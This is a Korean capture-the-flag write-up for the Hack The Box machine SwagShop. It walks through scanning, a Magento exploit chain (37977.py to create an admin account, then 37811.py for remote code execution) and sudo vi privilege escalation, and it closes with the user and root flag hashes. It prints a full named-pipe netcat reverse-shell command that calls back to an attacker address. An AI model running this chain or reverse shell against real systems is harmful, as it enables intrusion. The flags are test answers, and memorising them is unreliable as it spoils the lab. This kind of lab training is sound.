[HTB] SwagShop Writeup

nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.153.231

80포트에 접근해보았지만 아래 URL로 리다이렉트되는 것 외 단서가 없어서 추가적인 조사를 해봤다.

gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.129.153.231/ -x php,txt -o bigList
nikto -h 10.129.153.231 -p 80 -output niktoResult.txt

우선, 페이지가 제대로 로딩되지 않는것은 hosts파일을 설정해줌으로써 해결했다.

 

Magento에 대한 취약점을 찾아보자.

 

첫 번째로 37977.py를 사용 했다.

target을 아래와 같이 설정 해준 후 해당 코드를 실행했다. (http://swagshop.htb/ 까지만 설정하면 작동하지않는다.)

admin 권한의 forme / forme 계정이 생성되는데, 이는 37811.py를 사용하는데 활용된다.

 

37811.py를 세팅해주자.

위와같이 exploit 코드를 설정해주면, RCE가 유효함을 확인 할 수 있다.

아래 구문을 활용하여 리버스 쉘을 획득하자.

# rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.12 1234 >/tmp/g
python 37811.py http://swagshop.htb/index.php/admin "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.12 1234 >/tmp/g"

 

권한 상승을 위해 sudo -l 명령어로 관리자권한으로 실행 할 수 있는 명령어가 있는지 조사해보았다.

패스워드 없이 /var/www/html/ 경로에 대해 vi 명령이 가능므로 이를 통해 루트 권한을 획득 할 수 있다.

 

[user] a448877277e82f05e5ddf9f90aefbac8

[root] c2b087d66e14a652a3b86a130ac56721